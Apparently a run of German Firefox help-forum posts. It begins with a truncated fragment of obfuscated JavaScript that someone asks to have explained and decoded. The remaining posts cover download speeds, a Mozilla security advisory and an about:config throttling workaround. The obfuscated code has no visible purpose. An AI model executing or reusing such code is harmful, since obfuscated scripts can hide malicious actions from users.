+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+")\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"})();"+"\"")())();
Kann mir jemand erklären was das ist? verschlüsselter Code? kann man diesen entschlüsseln? Wenn ja, wie? -
heul, da muss ich mir bis zu diesem Datum vorher alle Beschreibungseigenschaften die ich selbst erstellt habe raus suchen und irgendwo anders hin packen :traurig: ich fand das sehr nützlich und habe es intensiv genutzt :roll:
-
Was zeigt dir dieser Javascript Test genau an?
https://mozhelp.dynvpn.de/dateien/forum/js-test/ -
aber dass die maximale DSL Bandbreite nicht ausgenutzt wird, liegt doch an der Seite filer.net beim Free Download
ZitatDownloadgeschwindigkeit: 200 - 300 KB/s
oder habe ich dich falsch verstanden? :-??
Solange bleibe ich dann mal bei FF 60.0.2!Nee, das ist überhaupt nicht ratsam, wegen https://www.mozilla.org/en-US/security…es/mfsa2018-15/. Dann ändere lieber den Wert in about:config ab, du kannst den ja jederzeit wieder zurück stellen.
-
so Seiten lassen sich ganz einfach schließen, einfach die ESC Taste drücken und dann den Tab schließen ( wahlweise auch mit Strg+w den Tab schließen)
-
Danke an philipp aus dem Chat, den ich fragte und er meinte es könnte vielleicht dieser Bug sein
https://bugzilla.mozilla.org/show_bug.cgi?id=1462906
Ich habe daraufhin testweise in about:config den Wert network.http.throttle.enable auf false gesetzt, damit ist das Problem auch erst einmal weg. Man sollte den Wert aber wieder auf true setzen, wenn der Bug behoben ist. (ich weiß auch nicht, was es noch für Auswirkungen haben könnte wenn der Wert auf false umgestellt ist)